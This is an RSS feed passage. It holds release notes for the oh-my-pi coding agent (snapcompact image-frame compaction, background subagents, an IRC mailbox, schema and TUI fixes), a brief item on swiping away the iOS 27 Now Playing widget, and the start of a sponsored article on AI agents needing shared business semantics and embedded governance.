<li>Added the <code>snapcompact</code> compaction strategy via <code>@oh-my-pi/snapcompact</code>: instead of an LLM summary, discarded history is printed onto dense bitmap frames and re-attached to the compaction summary message as image blocks. <code>CompactionSummaryMessage</code> gains an optional <code>images</code> field, <code>estimateTokens()</code> charges per attached frame, and frames persist under <code>preserveData.snapcompact</code> with an 8-frame middle-out eviction budget.</li>
<li>Snapcompact frames are now rendered in a provider-aware shape (<code>SNAPCOMPACT_SHAPES</code> + <code>resolveSnapcompactShape(api)</code>), following the snapcompact 200k-token monolithic evals: Anthropic-family and unknown APIs get <code>8x8r-bw</code> (unscii-8 square cells, black ink, every line printed twice with the copy on a pale highlight band — read at F1 parity with raw text at ~2x lower cost and the most refusal-robust), Google gets <code>8x8r-sent</code> (sentence-hue ink, ~2.9x cheaper), and OpenAI gets <code>6x6u-sent</code> (unscii Lanczos-stretched to 6x6 cells — OpenAI bills a flat ~2.9k tokens per image, so frame count is the only cost lever) with <code>detail: "original"</code> on the frame images. <code>snapcompactCompact()</code> accepts <code>model</code>/<code>shape</code> options, frames persist their shape metadata, mixed-shape archives (provider switches, legacy 5x8 frames) are flagged in the reading instructions, and <code>snapcompactGeometry()</code>/<code>renderSnapcompactFrame()</code> now take a shape</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Compaction and branch-summary file lists are now a single <code>&lt;files&gt;</code> tag instead of <code>&lt;read-files&gt;</code>/<code>&lt;modified-files&gt;</code>: paths render as the grouped, prefix-folded directory tree the find/search tools emit (<code># dir/</code> headers, bare basenames), each annotated <code>(Read)</code>, <code>(Write)</code>, or <code>(RW)</code> — modified files that were also read get <code>(RW)</code>. Legacy tags in summaries written by earlier versions are still stripped and self-heal on the next compaction</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed queued steering messages being drained into an externally aborted run: interrupting mid-tool execution (e.g. Enter with a pending steer) dequeued the steer into the dying run — it landed in history without a response and the post-abort resume saw an empty queue, so the agent stopped instead of continuing. Steering/follow-up/aside queue polls are now skipped once the run's abort signal fires, leaving the queue intact for <code>Agent.continue()</code>.</li>
<li>Fixed <code>&lt;read-files&gt;</code> compaction lists recording the same file once per line-range/raw selector (<code>src/foo.ts:50-200</code>, <code>:raw</code>, <code>:1-50:raw</code>, …): read-tool selectors are now stripped before tracking, so reads dedupe to the base path and match their write/edit path when splitting read-only vs modified lists. Selector-polluted lists stored by earlier compactions self-heal on the next compaction. <code>readToolSupersedeKey()</code> now shares the same splitter (<code>splitReadSelector()</code>), gaining the <code>..</code> range alias and <code>L</code>-prefix forms it previously missed.</li>
<li>Fixed <code>estimateTokens()</code> undercounting thinking-heavy assistant messages on replay: <code>thinkingSignature</code> payloads (OpenAI Responses encrypted reasoning items, Anthropic signed thinking blocks, etc.) and <code>redactedThinking.data</code> are now charged alongside the visible thinking text, so the local estimate tracks provider-reported usage instead of straddling the threshold on every turn (<a href="https://github.com/can1357/oh-my-pi/issues/2275" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2275/hovercard">#2275</a>).</li>
</ul>
<h2>@oh-my-pi/pi-ai</h2>
<h3>Added</h3>
<ul>
<li>Added optional <code>ImageContent.detail</code> (<code>"auto" | "low" | "high" | "original"</code>): an OpenAI resolution hint forwarded by the <code>openai-responses</code> serializers (default stays <code>auto</code>) and by <code>openai-completions</code> for the values Chat Completions supports. <code>"original"</code> preserves native resolution — required for snapcompact frames, whose pixel-font glyphs do not survive the default downscale. Providers without a detail knob ignore the field.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed OpenRouter DeepSeek V4 strict tool schemas nesting <code>anyOf</code> inside the nullable wrapper for optional unions, which produced a branch without <code>type</code> and triggered OpenRouter's <code>Invalid tool parameters schema : field anyOf: missing field type</code> 400. (<a href="https://github.com/can1357/oh-my-pi/issues/2270" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2270/hovercard">#2270</a>)</li>
<li>Hardened strict tool-schema handling beyond the optional-union case: <code>enforceStrictSchema</code> now splices natively nested pure unions into the parent <code>anyOf</code> (only when the inner node carries no constraining siblings, since sibling keywords are conjunctive with <code>anyOf</code>), so source schemas with nested unions no longer produce type-less <code>anyOf</code> branches that strict upstream validators reject. (<a href="https://github.com/can1357/oh-my-pi/issues/2270" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2270/hovercard">#2270</a>)</li>
<li>Made the openai-completions non-strict retry reachable for <code>"mixed"</code> strict mode (previously gated to <code>all_strict</code>, i.e. Cerebras only) and taught it to recognize upstream tool-schema validation 400s (<code>Invalid tool parameters schema …</code>, <code>Invalid schema for function …</code>). A matching rejection now retries the request with base (non-strict) schemas and persists <code>strictToolsDisabled</code> on the provider session, so later requests skip the doomed strict attempt instead of paying a 400 + retry round-trip each turn. (<a href="https://github.com/can1357/oh-my-pi/issues/2270" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2270/hovercard">#2270</a>)</li>
<li>Cross-model <code>anthropic-messages → anthropic-messages</code> continuations now preserve prior assistant turns' reasoning chains end-to-end: every prior <code>thinking</code>/<code>redactedThinking</code> block survives (not just the latest surviving assistant), and third-party ↔ third-party replays keep their signatures intact so the reasoning chain stays signed for the next turn. Signatures are stripped (and any <code>redacted_thinking</code> sibling without a native landing spot is dropped) only when an official Anthropic endpoint is on either end of the replay — official Anthropic cryptographically binds reasoning signatures to its key+session+model, while compatible reasoning endpoints (Z.AI, DeepSeek, custom anthropic-messages providers configured via <code>models.yaml</code>) treat them as opaque continuation hints. Source-side official detection uses the canonical catalog provider id <code>"anthropic"</code> (assistant messages carry no <code>baseUrl</code>); target-side detection reuses the baked <code>compat.officialEndpoint</code> flag. Latest-turn byte-for-byte behavior (Anthropic's "thinking blocks in the latest assistant message cannot be modified" rule) and existing aborted/errored last-block sanitization are unchanged. (<a href="https://github.com/can1357/oh-my-pi/issues/2257" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2257/hovercard">#2257</a>, <a href="https://github.com/can1357/oh-my-pi/issues/2265" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2265/hovercard">#2265</a>)</li>
</ul>
<h2>@oh-my-pi/pi-catalog</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed <code>buildModel</code> so malformed explicit thinking metadata without <code>efforts</code> is treated as sparse input and inferred instead of crashing during model resolution (<a href="https://github.com/can1357/oh-my-pi/issues/2251" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2251/hovercard">#2251</a>).</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Removed the <code>resume</code> option from the <code>task</code> tool API and its resume execution path; continue work on finished subagents by sending follow-up messages via <code>irc</code> instead</li>
<li>Removed the <code>irc.enabled</code> setting: irc availability is now derived — the tool exists exactly when there is someone to message (the session can spawn subagents through <code>task</code>, or it is a subagent itself). A stale <code>irc.enabled</code> key in config is ignored</li>
<li>The <code>task</code> tool was reworked to always run spawns in the background as independent, persistent agents: results arrive as async job deliveries (block with <code>job poll</code> only when genuinely needed). The wire schema is now shape-swapped by the new <code>task.batch</code> setting (default on): <code>{ agent, context, tasks[] }</code> — one subagent per task item, per-item <code>isolated</code>, and a required shared <code>context</code> — or, when disabled, a flat single-spawn shape <code>{ agent, id?, description?, assignment, isolated? }</code> with shared background passed via <code>local://</code> files instead</li>
<li>Removed the <code>task.simple</code> setting and the task tool's per-call <code>schema</code> parameter outright: structured subagent output now comes only from the agent definition's <code>output</code> frontmatter or the inherited session schema, and ad-hoc structured workflows use eval <code>agent(prompt, schema)</code>. A stale <code>task.simple</code> key in config is migrated away</li>
<li>Reworked <code>irc</code> to <code>send</code>/<code>wait</code>/<code>inbox</code>/<code>list</code> ops over a per-agent mailbox bus: the blocking <code>awaitReply</code> auto-reply turn is removed — <code>send</code> is fire-and-forget with delivery receipts, and replies are real turns by the recipient observed via <code>wait</code> (or the <code>send</code> <code>await: true</code> sugar)</li>
<li>Removed the <code>context</code> argument from eval <code>agent()</code> in both the JS and Python preludes: pass shared background via a <code>local://</code> file referenced in the prompt</li>
<li>Replaced the standalone session-observer overlay with the Agent Hub: <code>app.session.observe</code> (<code>ctrl+s</code>) now opens the hub, whose chat view absorbed the observer's transcript renderer</li>
</ul>
<h3>Added</h3>
<ul>
<li>Snapcompact compaction now passes the session model so frames render in the provider-optimal shape (unscii <code>8x8r-bw</code> for Anthropic-family/unknown APIs, <code>8x8r-sent</code> for Google, Lanczos-stretched <code>6x6u-sent</code> with <code>detail: "original"</code> for OpenAI), per the snapcompact 200k-token evals</li>
<li>Added per-turn supersede pruning of stale <code>read</code> results: when a file is re-read, older copies of the same path/selector are pruned from context at cache-favorable moments (small suffix, idle gap, or alongside overflow pruning). Gated by the new <code>compaction.supersedeReads</code> setting (default on)</li>
<li>Added soft request budgets for task subagents (explore/quick_task 40, others 90, configurable via <code>task.softRequestBudget</code>, 0 disables): crossing the budget injects a one-time wrap-up steer into the child; crossing 1.5× aborts the run gracefully</li>
<li>Added cancelled/aborted subagent salvage: instead of <code>(no output)</code>, merged task results now carry the child's last activity snippet plus request/token stats, and per-child stats lines include request counts</li>
<li>Added a repeat-read notice to the <code>read</code> tool: the third and later reads of the same file in a session append a one-line note suggesting range re-reads or the context echoed in edit results</li>
<li>Added a hard inline byte cap (~50KB) at the bash and browser tool-result boundaries with head/tail elision and an <code>artifact://</code> footer for the full output, closing paths that previously let 100KB+ results land inline</li>
<li>Added the Agent Hub overlay (<code>ctrl+s</code>, <code>alt+a</code>, or double-tap left arrow on an empty editor): a live table of registered subagents (status, unread IRC count, current task, last activity) with per-agent chat — Enter opens a transcript + input line that steers a running agent, prompts an idle one, and revives a parked one; <code>r</code> revives and <code>x</code> aborts/releases the selected agent</li>
<li>Added the <code>snapcompact</code> compaction strategy (<code>compaction.strategy: "snapcompact"</code>): history is archived onto dense bitmap "snapcompact" frames a vision model reads back directly, instead of an LLM-generated summary — instant, free, and verbatim. Auto compaction (including overflow recovery) and manual <code>/compact</code> both honor it; falls back to context-full with a visible warning notice when the current model is text-only (e.g. Codex API surfaces) or when <code>/compact</code> is given custom instructions. Frames survive context rebuilds and later compactions (budget eviction is middle-out: the session-head frame is pinned); the expanded compaction message notes the attached frame count</li>
<li>Added a persistent subagent lifecycle: finished subagents stay live as <code>idle</code>, are parked to disk after <code>task.agentIdleTtlMs</code> (default 7 minutes; <code>0</code> keeps them live until exit), and are revived automatically when messaged or prompted from the Agent Hub</li>
<li>Added the <code>history://</code> protocol: <code>history://</code> lists every registered agent and <code>history://&lt;agentId&gt;</code> renders a concise markdown transcript (tool calls collapsed to one line each, thinking elided) for live and parked agents alike</li>
<li>Added an IRC mailbox bus with bounded per-agent inboxes: <code>irc</code> <code>wait</code> blocks until a matching message arrives, <code>inbox</code> drains or peeks pending messages, and sending to an idle or parked agent wakes or revives it for a real turn</li>
<li>Added a dedicated TUI renderer for the <code>irc</code> tool: directional send/receive headers with delivery-outcome coloring, quoted message bodies with expand-aware truncation, per-recipient receipt trees for broadcasts and failures, and status-badged peer listings with unread counts</li>
<li>Added the <code>task.batch</code> setting (default on): the task tool's batch shape <code>{ agent, context, tasks[] }</code> spawns one subagent per item — each its own independent background job with the normal idle/parked lifecycle and optional per-item isolation — and prepends the required shared <code>context</code> to every spawned subagent's system prompt; disabling it restores the flat single-spawn schema</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed task-tool sync execution to fan out multiple <code>tasks[]</code> items in parallel and return a merged result payload when no async job manager is available</li>
<li>Changed the compaction UX so the conversation no longer visually restarts: the TUI renders the full-history display transcript (<code>buildSessionContext({ transcript: true })</code>), with each compaction shown as a slim inline divider — <code>── 📷 compacted · ctrl+o ──</code> — at the point it fired; expanding (ctrl+o) reveals the summary and snapcompact frame count. Applies to live compaction, <code>/compact</code>, <code>/tree</code> navigation, and session resume</li>
<li>Changed <code>async.enabled</code> to gate async bash commands only — the <code>task</code> tool now runs asynchronously regardless of the setting</li>
<li>Changed <code>irc.timeoutMs</code> to be the default timeout for <code>irc</code> <code>wait</code> and <code>send</code> with <code>await: true</code></li>
<li>Moved the grouped path-tree helpers (<code>buildPathTree</code>, <code>walkPathTree</code>, find's grouped output formatter — now <code>formatGroupedPaths</code>) to <code>@oh-my-pi/pi-utils</code> so compaction summaries can render file lists with the same prefix-folded tree as find/search; <code>tools/find</code> no longer exports <code>formatFindGroupedOutput</code></li>
<li>Changed TTSR rule notifications to combine rules into one block: a multi-rule match renders <code>name: description</code> rows (collapsed view caps at 4 rules with a <code>+N more</code> hint, ctrl+o expands), and consecutive notifications merge into the previous block while it is still the live transcript tail</li>
</ul>
<h3>Removed</h3>
<ul>
<li>Removed the pre-initialization startup splash and input buffer, so commands typed during launch are no longer queued and are handled only after the interactive TUI initializes</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed <code>irc</code> live message delivery so successfully handed-off messages are no longer enqueued as mailbox mail, so they do not inflate unread <code>irc</code> counts</li>
<li>Fixed <code>irc send</code> with <code>await: true</code> to wait for a fresh reply to the current call instead of consuming previously buffered messages</li>
<li>Fixed main-session chat output to stop duplicating outbound <code>irc</code> sends from the main agent as relay cards</li>
<li>Fixed task-tool runtime compatibility so legacy flat <code>task</code> calls (<code>agent</code>, <code>assignment</code>) still execute under <code>task.batch</code> even though the wire schema is batch-first</li>
<li>Fixed the <code>job</code> tool's TUI preview leaking the model-facing <code>&lt;task-result&gt;</code> envelope for settled task jobs — the preview now shows the inner output body, and pretty-printed JSON bodies are flattened onto one line instead of previewing a lone <code>{</code></li>
<li>Fixed npm CLI distribution bundles by embedding the stats dashboard client bundle so dashboard assets are served in prebuilt installs</li>
<li>Fixed the <code>resolve</code> tool's result block turning white after the leading icon: the accent-styled symbol embedded a foreground reset inside the inverse-rendered line, dropping the block color for the rest of the row</li>
<li>Fixed the CLI smoke-test command to start the stats server and verify dashboard HTML is served, catching bundled-asset regressions</li>
<li>Added verification of a <code>&lt;div id="root"&gt;&lt;/div&gt;</code> and <code>index.js</code> in smoke-test dashboard responses</li>
<li>Restored the checkmark glyph on ask-tool custom answers and the multi-select "Done selecting" option, which a status-glyph sweep had swapped for the ask tool icon</li>
<li>Fixed the <code>thinking.autoPending</code> statusbar indicator using question-mark glyphs (<code>▣?</code>, nf-md-help_box, <code>[?]</code>) in every symbol preset, which made the auto-thinking pending state indistinguishable from a terminal missing-glyph fallback. Replaced with clear loading indicators (<code>⟳</code>, fa-circle-o-notch, <code>[~]</code>) (<a href="https://github.com/can1357/oh-my-pi/issues/2267" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2267/hovercard">#2267</a>).</li>
<li>Fixed <code>tab.screenshot({ save })</code> ignoring the save path's extension: an explicit <code>.webp</code>/<code>.jpg</code> destination received hardcoded PNG bytes behind a mismatched name. The full-res capture format is now derived from the save path (<code>png</code>/<code>jpeg</code>/<code>webp</code>, puppeteer-native), and the reported mime type follows the bytes actually written; unknown or missing extensions still capture PNG</li>
<li>Fixed an infinite <code>compaction.strategy: shake</code> auto-continue loop in thinking-heavy sessions: the post-shake check now uses the provider-anchored trigger metric (instead of a local estimate that undercounts <code>thinkingSignature</code> payloads) and only treats pressure as resolved when residual context lands inside an 80% recovery band, so shake reliably falls back to context-full compaction when it cannot create real headroom (<a href="https://github.com/can1357/oh-my-pi/issues/2275" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2275/hovercard">#2275</a>).</li>
</ul>
<h2>@oh-my-pi/hashline</h2>
<h3>Changed</h3>
<ul>
<li>Block-unresolved errors (<code>replace block N:</code> / <code>delete block N</code> / <code>insert after block N:</code> failing to resolve a syntactic block) now append a numbered preview of the file around the anchor line — same <code>*</code>-marked context rows the hash-mismatch error shows — so the offending line is visible without a re-read</li>
</ul>
<h2>@oh-my-pi/pi-natives</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Changed <code>renderSnapcompactPng(text, options)</code> to return a base64-encoded PNG <code>string</code> instead of a <code>Uint8Array</code></li>
</ul>
<h3>Added</h3>
<ul>
<li>Added dim-span ink toggles to <code>renderSnapcompactPng</code>: <code>U+000E</code>/<code>U+000F</code> in the input switch to a dim gray ink (palette index 9) and back without occupying a glyph cell, letting callers visually de-emphasize spans such as archived tool output</li>
<li>Added <code>renderSnapcompactPng(text, options)</code>: rasterizes pre-normalized text onto a square PNG in an eval-validated snapcompact shape. Options select the bundled font (<code>5x8</code> X.org BDF or <code>8x8</code> unscii-8, both public domain, shipped in <code>crates/pi-natives/src/fonts/</code>), the ink variant (<code>sent</code> six-hue sentence cycling or <code>bw</code> black), line repetition (each text line printed N times, copies on a pale highlight band), and a target cell size — cells differing from the font's natural cell render via Lanczos3 stretch into an anti-aliased RGB frame (e.g. the OpenAI-optimal 6x6 unscii shape); native-cell shapes encode as 4-bit indexed PNG. Replaces the JS rasterizer/PNG writer previously in <code>@oh-my-pi/pi-agent-core</code>.</li>
</ul>
<h2>@oh-my-pi/snapcompact</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Changed <code>renderSnapcompactFrame</code> output from <code>png: Uint8Array</code> to <code>data: string</code> base64, requiring consumers to read frame payloads from <code>frame.data</code></li>
</ul>
<h3>Added</h3>
<ul>
<li>Added new serialization options <code>toolResultMaxChars</code>, <code>toolArgMaxChars</code>, <code>toolCallMaxChars</code>, <code>truncateHeadRatio</code>, and <code>dimToolResults</code> to <code>snapcompactCompact</code>/<code>serializeSnapcompactConversation</code> so callers can tune how tool results and arguments are archived</li>
<li>Added exported default constants <code>SNAPCOMPACT_TOOL_RESULT_MAX_CHARS</code>, <code>SNAPCOMPACT_TOOL_ARG_MAX_CHARS</code>, <code>SNAPCOMPACT_TOOL_CALL_MAX_CHARS</code>, and <code>SNAPCOMPACT_TRUNCATE_HEAD_RATIO</code> for reuse when configuring truncation limits</li>
<li>Added provider-specific snapcompact frame-shape presets and shape helpers (<code>SNAPCOMPACT_SHAPES</code>, <code>resolveSnapcompactShape</code>, <code>isSnapcompactShape</code>) so callers can consistently select validated image-frame geometry for archive renders</li>
<li>Added <code>file-operations.md</code> and <code>snapcompact-summary.md</code> prompts to preserve file-read/write context and frame metadata in the compaction prompt flow</li>
<li>Added a full <code>packages/snapcompact/research</code> experiment and visualization suite for running snapcompact SQuAD studies, provider probes, and activation-style analyses</li>
<li>Added package-level TypeScript exports and publication config so consumers can import <code>@oh-my-pi/snapcompact</code> with typed access to snapcompact APIs</li>
<li>Published <code>@oh-my-pi/snapcompact</code> as the reusable snapcompact compaction package, including bitmap-frame rendering helpers, archive helpers, and the local <code>snapcompactCompact()</code> strategy.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed truncation in archived tool output to keep both the beginning and end of long text using a configurable head/tail ratio instead of a single hard cut</li>
<li>Changed tool-result text rendering so archived tool results are shown in dim gray ink by default and the summary prompt notes that dim text is archived tool output</li>
<li>Changed <code>RenderedFrame</code> visible-character accounting so <code>chars</code> no longer includes invisible dim-control markers</li>
<li>Changed the file-operations summary block to a single <code>&lt;files&gt;</code> tag: one grouped, prefix-folded directory tree with per-file <code>(Read)</code>/<code>(Write)</code>/<code>(RW)</code> markers, replacing the separate <code>&lt;read-files&gt;</code>/<code>&lt;modified-files&gt;</code> lists; <code>upsertSnapcompactFileOperations</code> takes the cumulative read set to distinguish <code>(RW)</code> from blind writes</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed frame rendering at archive chunk boundaries to reopen dim spans when a chunk ends inside a dimmed tool-result segment</li>
<li>Fixed message serialization to strip user- and assistant-provided dim markers so only renderer-generated dim spans can be applied</li>
</ul>
<h2>@oh-my-pi/omp-stats</h2>
<h3>Added</h3>
<ul>
<li>Added support for prebuilt npm bundle mode via <code>PI_BUNDLED</code>, allowing the stats server to use an embedded dashboard bundle in packaged CLI distributions</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed handling of legacy <code>embedded-client.generated.txt</code> placeholder content so it is treated as missing archive instead of being decoded into invalid bytes</li>
<li>Fixed ENOENT handling while scanning dashboard source/build directories so missing <code>client/</code> or <code>dist/client</code> trees no longer crash startup</li>
</ul>
<h2>@oh-my-pi/pi-tui</h2>
<h3>Added</h3>
<ul>
<li>Added support for asynchronous <code>onSubmit</code> handlers by allowing the callback to return a <code>Promise&lt;void&gt;</code></li>
</ul>
<h2>@oh-my-pi/pi-utils</h2>
<h3>Added</h3>
<ul>
<li>Added the <code>path-tree</code> module (<code>buildPathTree</code>, <code>walkPathTree</code>, <code>formatGroupedPaths</code>, <code>isUrlLikePath</code>), moved from the coding agent's grouped file output so compaction file lists can share the same prefix-folded directory-tree rendering; <code>formatGroupedPaths</code> gains an optional <code>annotate</code> callback for per-file suffixes</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed the <code>{{join}}</code> prompt helper joining with a literal two-character <code>\n</code> when templates pass <code>"\n"</code> as the separator — Handlebars string literals carry no escape processing. The separator now unescapes <code>\n</code>/<code>\t</code>, matching the <code>{{#list}}</code> helper's documented convention (visible as literal <code>\n</code> between paths in compaction <code>&lt;read-files&gt;</code> lists).</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix(ai): preserve 3p anthropic-messages reasoning chains across model swaps by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4634060202" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2266" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2266/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2266">#2266</a></li>
<li>fix(tui): replaced thinking.autoPending question-mark glyphs with loading indicators by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4634329299" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2268" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2268/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2268">#2268</a></li>
<li>fix(catalog): handle missing thinking efforts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4630134022" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2252" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2252/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2252">#2252</a></li>
<li>fix(ai): flatten OpenRouter DeepSeek strict unions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4634643976" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2271" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2271/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2271">#2271</a></li>
<li>fix(agent): break shake auto-continue loop when local estimate diverges from provider usage by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4635063548" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2277" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2277/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2277">#2277</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v15.10.12...v15.11.0"><tt>v15.10.12...v15.11.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[iOS 27 Lets You Dismiss the Now Playing Widget From the Lock Screen]]></title>
<description><![CDATA[Apple has added a small but useful Lock Screen change in iOS 27: users can now clear the Now Playing widget by swiping it away, similar to dismissing a notification. This helps when music, podcasts, or video controls stay on the Lock Screen after playback has stopped.



When the media is playing...]]></description>
<link>https://tsecurity.de/de/3588232/ios-mac-os/ios-27-lets-you-dismiss-the-now-playing-widget-from-the-lock-screen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588232/ios-mac-os/ios-27-lets-you-dismiss-the-now-playing-widget-from-the-lock-screen/</guid>
<pubDate>Wed, 10 Jun 2026 18:00:05 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has added a small but useful Lock Screen change in iOS 27: users can now clear the Now Playing widget by swiping it away, similar to dismissing a notification. This helps when music, podcasts, or video controls stay on the Lock Screen after playback has stopped.



When the media is playing, the Now Playing panel appears on the Lock Screen as usual. In iOS 27, you can swipe it away to remove it from view, giving your wallpaper and notifications more space.



Early beta users report that bringing the widget back is not always instant. According to current reports, the workaround is to pause playback, wait a few minutes, and then resume, while switching to video playback can also make it return.



Since iOS 27 is still in beta, Apple can refine this behavior before the public release.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI is about to replace the interface. Business leaders aren’t ready]]></title>
<description><![CDATA[Presented by Snowflake As AI agents become capable of reasoning across systems and taking action, software is evolving from something employees operate into something that understands intent. Instead of navigating disparate applications and dashboards, a single system will increasingly ask: What ...]]></description>
<link>https://tsecurity.de/de/3588149/it-nachrichten/ai-is-about-to-replace-the-interface-business-leaders-arent-ready/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3588149/it-nachrichten/ai-is-about-to-replace-the-interface-business-leaders-arent-ready/</guid>
<pubDate>Wed, 10 Jun 2026 17:21:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><i>Presented by Snowflake </i></p><hr><p>As AI agents become capable of reasoning across systems and taking action, software is evolving from something employees operate into something that understands intent. Instead of navigating disparate applications and dashboards, a single system will increasingly ask: What are you trying to accomplish?</p><p>That sounds like a user experience breakthrough. It is. But the more important implication is organizational. When software no longer relies on humans to provide context, companies can no longer assume that knowledge lives in employees' heads or is buried inside disconnected applications. The company itself has to become machine-readable.</p><p>The winners in the AI era won't simply deploy more intelligent models. They'll build the data foundations, semantic context, and governance frameworks that allow machines to understand how the business works and act on that understanding with confidence.</p><h2>Context is becoming infrastructure </h2><p>For years, companies treated context as a human layer on top of data. The data platform held the records, then the BI tool visualized them, and the analyst interpreted them. And finally, the business leader made the judgment call. Agents collapse those layers.</p><p>When an executive asks, “Why is customer churn rising in our enterprise segment?” an effective agent needs to know far more than where the customer data lives. It needs to understand how the company defines churn, which accounts count as enterprise, whether product usage data is more reliable than survey data, which renewal events matter, what the sales team has logged, what support tickets suggest, and whether the answer differs by geography or product line.</p><p>This is why semantics — the definitions, relationships, rules, and assumptions that give data meaning — are moving from a technical concern to a boardroom issue. A semantic layer used to sound like plumbing for data teams. In an agentic enterprise, it becomes the shared language between humans and machines.</p><p>If every department teaches its own agent a different version of the business, companies will get inaccuracy at scale. The organizations that pull ahead will be the ones that create a common business knowledge base: consistent definitions, governed access, documented workflows, clear lineage, and enough flexibility to evolve as the business changes. In that world, context is treated as infrastructure, rather than just a nice-to-have.</p><h2>From dashboards to decisions </h2><p>The first wave of enterprise AI largely gave us assistants and copilots that answer questions. Useful, but still limited. You ask a question, get a response, and then return to the work of stitching systems together yourself.</p><p>The next era of AI will be different. Agents will move beyond coordinating answers, and start getting actual work done. A sales leader starting the day will not need to open a CRM, a forecasting tool, a support dashboard, and a Slack thread to understand what changed overnight. They will simply ask an agent what needs attention. The agent will identify which accounts are at risk, explain why, summarize recent customer interactions, draft follow-up actions, and perhaps initiate the next workflow.</p><p>The dashboard does not disappear because charts become useless. It disappears because static reporting becomes too slow for how businesses need to operate. The center of gravity shifts from “show me what happened” to “help me decide what to do next.”</p><h2>The new governance problem: agents that act </h2><p>As long as AI is mostly answering questions, governance is about controlling what it can access. That is already difficult. Employees have different permissions, sensitive data needs protection, and answers must be traceable to trusted sources. As agents begin taking action, governance becomes even more consequential.</p><p>It’s one thing for an agent to summarize a customer complaint. It’s another for it to issue a refund, reorder inventory, or send an email to a customer. This is where many companies will be tempted to choose between two imperfect paths.</p><p>One path is to tightly constrain agents from the start: define the data sources, tools, workflows, and actions they can access. This is easier to manage and measure. It also risks limiting the creativity of employees who understand their workflows best.</p><p>The other path is to let teams experiment freely: connect agents to the tools and data they use every day, and allow new use cases to emerge organically. This can produce faster adoption and unexpected innovation. It can also create real risk: stale data, inappropriate access, duplicated workflows, runaway costs, or automated actions no one fully understands.</p><p>The right answer is not maximum control or maximum freedom. It’s to prioritize governed flexibility. Companies need architectures where governance is embedded from the beginning. An agent should know not only what it can read, but what it can do, when it needs approval, how its reasoning is inspected, and how its performance is evaluated over time. In other words, governance cannot be a review meeting after the pilot. It has to be part of the system design.</p><h2>The boundary between builder and user is collapsing </h2><p>One of the least appreciated consequences of agentic AI is that it will blur the line between people who use software and people who create it. When employees can describe a workflow in natural language and have an agent help build it, software development becomes less confined to engineering teams. A marketer can create a campaign analysis workflow. A finance manager can automate variance explanations. An HR leader can build a policy assistant. A support manager can design a triage 